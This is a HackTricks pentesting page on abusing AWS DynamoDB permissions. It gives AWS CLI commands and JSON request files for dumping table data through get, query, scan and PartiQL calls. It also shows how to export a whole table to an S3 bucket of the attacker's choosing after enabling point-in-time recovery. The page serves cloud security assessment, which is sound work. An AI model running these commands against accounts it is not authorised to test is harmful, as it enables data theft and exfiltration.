Skip to content

Latest commit

 

History

History
171 lines (121 loc) · 6.14 KB

aws-dynamodb-privesc.md

File metadata and controls

171 lines (121 loc) · 6.14 KB
Raw

AWS - DynamoDB Privesc

Support HackTricks and get benefits!

dynamodb

For more info about dynamodb check:

{% content-ref url="../aws-services/aws-databases/aws-dynamodb-enum.md" %} aws-dynamodb-enum.md {% endcontent-ref %}

dynamodb:BatchGetItem

An attacker with this permissions will be able to get items from tables by the primary key (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (describe-table).

aws dynamodb batch-get-item --request-items file:///tmp/a.json

// With a.json
{
    "ProductCatalog" : { // This is the table name
        "Keys": [
            {
            "Id" : { // Primary keys name
                "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
            }
            }
        ]
    }
}

Potential Impact: Indirect privesc by locating sensitive information in the table

dynamodb:GetItem

Similar to the previous permissions this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:

aws dynamodb get-item --table-name ProductCatalog --key  file:///tmp/a.json

// With a.json
{ 
"Id" : { 
    "N": "205"
}
}

With this permission it's also possible to use the transact-get-items method like:

aws dynamodb transact-get-items \
    --transact-items file:///tmp/a.json

// With a.json
[
    {
        "Get": {
            "Key": {
                "Id": {"N": "205"}
            },
            "TableName": "ProductCatalog"
        }
    }
]

Potential Impact: Indirect privesc by locating sensitive information in the table

dynamodb:Query

Similar to the previous permissions this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a subset of comparisons, but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.

aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
 
 // With a.json
 { 
"Id" : { 
    "ComparisonOperator":"EQ",
    "AttributeValueList": [ {"N": "205"} ]
    }
}

Potential Impact: Indirect privesc by locating sensitive information in the table

dynamodb:Scan

You can use this permission to dump the entire table easily.

aws dynamodb scan --table-name <t_name> #Get data inside the table

Potential Impact: Indirect privesc by locating sensitive information in the table

dynamodb:PartiQLSelect

You can use this permission to dump the entire table easily.

aws dynamodb execute-statement \
    --statement "SELECT * FROM ProductCatalog"

This permission also allow to perform batch-execute-statement like:

aws dynamodb batch-execute-statement \
    --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'

but you need to specify the primary key with a value, so it isn't that useful.

Potential Impact: Indirect privesc by locating sensitive information in the table

dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)

This permission will allow an attacker to export the whole table to a S3 bucket is his election:

aws dynamodb export-table-to-point-in-time \
    --table-arn <arn> \
    --s3-bucket <bucket>

Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:

aws dynamodb describe-continuous-backups \
  --table-name <tablename>

If it isn't enabled, you will need to enable it and for that you need the dynamodb:ExportTableToPointInTime permission:

aws dynamodb update-continuous-backups \
    --table-name <value> \
    --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true

Potential Impact: Indirect privesc by locating sensitive information in the table

TODO: Read data abusing data Streams

TODO: Write data to perform bypasses & injections

Support HackTricks and get benefits!